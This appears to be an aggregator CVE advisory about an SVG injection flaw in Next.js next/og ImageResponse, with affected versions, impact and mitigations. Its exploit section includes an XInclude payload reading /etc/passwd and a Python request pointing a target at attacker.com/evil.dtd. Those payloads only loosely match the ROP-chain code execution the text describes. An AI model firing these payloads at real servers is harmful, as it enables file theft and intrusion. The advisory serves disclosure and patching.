Nextjs (next/og) ImageResponse Remote Code Execution, SVG Injection, CVE-2026-94545 (Critical) -DC-Sep2026-2663

Listen to this Post

The Node.js ImageResponse implementation from next/og is affected by an upstream vulnerability in the Satori library (CWE-116: Improper Encoding or Escaping of Output). Satori, which converts JSX/HTML-like structures into SVG before rasterization, fails to properly escape attacker-controlled values placed into SVG content, attributes, or styles. This allows crafted input to be interpreted as SVG markup rather than harmless text.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation. A typical vulnerable pattern is:

import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
const value = new URL(request.url).searchParams.get('value') ?? ''
return new ImageResponse(

<svg width="1200" height="630">
<>{value}</>
</svg>

)
}

When the application runs on the Node.js runtime with `sharp` installed, the generated SVG is rasterized by native libraries (libvips, librsvg, libxml2) rather than the sandboxed wasm renderer. A payload built from an XInclude reference and nested DTD entities corrupts memory inside the native parser. Since the official Node.js binary is non-PIE, its code and GOT are not randomized, allowing a fixed ROP chain to reach `execve` without an address leak. One unauthenticated request to an OG-image route is sufficient to run commands as the server process.
Applications using the Edge ImageResponse implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected. The vulnerability affects Next.js versions 16.2.0 through 16.3.5 and Satori versions >=0.0.27 <0.33.5. Patched releases are Next.js 16.3.6 and Satori 0.33.5.
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js ImageResponse implementation from next/og. Escape untrusted input as XML before rendering, or keep it out of the generated image entirely.

DailyCVE Form:

Platform: Next.js
Version: 16.2.0–16.3.5
Vulnerability: SVG Injection
Severity: Critical
date: September 22, 2026

Prediction: October 2026

What Undercode Say

Analytics

curl -s "http://target/api/og?value=hello" -o /dev/null -w "%{http_code}\n"
// Vulnerable route pattern to search for in codebase
grep -r "from 'next/og'" --include=".ts" --include=".tsx" .
grep -r "ImageResponse" --include=".ts" --include=".tsx" .
Check runtime and sharp installation
grep -r "runtime" --include=".ts" --include=".tsx" app/ | grep -i "edge|nodejs"
npm list sharp

How Exploit: (Educational Purposes!)

docker build -t cve-2026-94545 .
docker run -d --name cve-2026-94545 -p 3000:3000 cve-2026-94545
curl -s -o /dev/null -w "%{http_code}\n" "http://127.0.0.1:3000/api/og?value=hello"
<!-- XInclude payload embedded in SVG -->
<><xi:include href="file:///etc/passwd" parse="text" xmlns:xi="http://www.w3.org/2001/XInclude"/></>
import requests
payload = '<xi:include href="http://attacker.com/evil.dtd" parse="text" xmlns:xi="http://www.w3.org/2001/XInclude"/>'
requests.get(f"http://target/api/og?value={payload}")

Protection: from this CVE

  • Upgrade Next.js to 16.3.6 or later
  • Upgrade Satori to 0.33.5 or later (if used directly)
  • Never pass untrusted input into SVG content, attributes, or styles
  • Escape all dynamic values as XML before rendering
  • Use Edge runtime (export const runtime = 'edge') to avoid the native rasterizer path
  • Remove `sharp` if not strictly required
  • Audit all `ImageResponse` imports from `next/og` for untrusted data flow

Impact

  • Unauthenticated remote code execution as the Next.js server process
  • Any route that passes request data into `ImageResponse` is a potential sink
  • The exploit is blind — a successful `execve` replaces the worker, requiring reverse shell or out-of-band exfiltration
  • The payload is stable due to non-PIE Node binary, no address leak required
  • A successful hit crashes the worker process, causing denial of service until restart
  • CVSS v4.0 Base Score: 9.5 (Critical)
  • CVSS v3 Base Score: 10.0
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top